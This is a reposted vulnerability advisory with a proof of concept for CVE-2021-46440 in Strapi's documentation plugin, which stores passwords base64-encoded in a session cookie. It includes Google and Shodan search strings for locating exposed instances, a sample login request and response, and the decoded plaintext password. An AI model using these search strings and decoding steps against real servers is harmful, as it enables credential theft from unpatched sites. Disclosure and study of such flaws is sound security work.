Strapi 3.6.8 Pengungkapan Kata Sandi / Penanganan Tidak Aman

  • Whatsapp
Message System 1.0 Local File Inclusion
Message System Local File Inclusion

News.nextcloud.asia

Versi strap sebelum 3.6.9 dan 4.1.5 mengungkapkan kata sandi pengguna karena hanya base64 yang menyandikannya dan menempelkannya di cookie.

SHA-256 | 069e678d219ce2bfcd777e3fcf09ee5a7c59fe5b6c563e15e918fd0877c7aff7

# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format
# Google Dork: intitle:"Welcome to your Strapi ap"
# Shodan search: "X-Powered-By: Strapi <strapi.io>"
# Date: 2022-03-30
# Exploit Author: Kitchaphan Singchai [idealphase]
# Vendor Homepage: https://strapi.io/
# Software Link: https://github.com/strapi/strapi/releases
# Vulnerable Version: < 3.6.9 and < 4.1.5
# Version: 3.6.8
# Tested on: Linux
# CVE: CVE-2021-46440

# Description:
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.

# This CVE has been fixed via this Github pull request.
- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)

# PoC:
[Request]
POST /documentation/login HTTP/1.1
Host: 127.0.0.1:1337
..[SNIP]..

password=password

[Response]
HTTP/1.1 302 Found
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly
X-Powered-By: Strapi <strapi.io>
..[SNIP]..

Redirecting to <a href="http://exploit.kitploit.com/documentation">/documentation</a>.

Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.
{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}

# Timeline:
19/Jan/2022 - Inform vulnerability to Strapi team
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)
28/Mar/2022 - Reserved CVE-2021-46440
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.